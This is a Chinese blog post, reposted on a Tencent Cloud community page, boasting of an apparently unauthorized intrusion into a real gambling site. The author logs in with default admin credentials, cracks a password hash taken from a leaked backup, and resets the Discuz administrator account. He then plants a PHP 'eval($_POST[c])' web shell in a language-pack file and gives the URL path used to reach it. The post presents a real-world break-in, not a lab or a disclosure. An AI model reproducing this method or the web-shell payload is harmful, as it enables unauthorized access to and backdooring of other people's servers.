首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >男默女泪!一次备份文件泄露引起的Getshell

男默女泪!一次备份文件泄露引起的Getshell

作者头像
ChaMd5安全团队
发布2018-03-29 11:29:27
发布2018-03-29 11:29:27
1.7K0
举报
文章被收录于专栏:ChaMd5安全团队ChaMd5安全团队
一次备份文件泄露引起的Getshell

From ChaMd5安全团队核心成员 S0usa

闲来无事手挺痒,又碍于M的淫威叫我写稿子,于是当我双手放在键盘时就注定某个站会拜倒在我石榴裙下。

正规网站不敢撸,只能挑菠菜类的下手了。现在是北京时间凌晨2:25分。(废话不多说)

目标:一个六合彩网站

主站采用phpwind程序

站中站采用discuz程序

1: 打开网站习惯性输入robots.txt 发现是phpwind程序

然后我十八年的麒麟臂自动输入了admin.php user:admin pass:admin

结果真尼玛进去了

翻了一番没什么可以利用的 开启了扫描器扫了一番发现有个备份文件

Down下来查看 发现有个站中站 bbs目录 用的是discuz系统 查了下创屎人的PW

来到了我大CHAMD5.org解密,发现密码是admin123 我勒个fuck

马上登陆ucenter重置了管理员密码然后登陆后台admincp.php

进入语言包的actions编辑 拉到最底下的游客

修改成“游客\\\\\\\\');eval($_POST[c]);echo (""//”

然后啪啪啪访问http://xxxxx/bbs/templates/default/actions.lang.php 一句话密码是c

附上菊花图:

哦对了,忘了自我介绍,我是ChaMd5安全团队里最帅的S0usa

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-04-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 ChaMd5安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档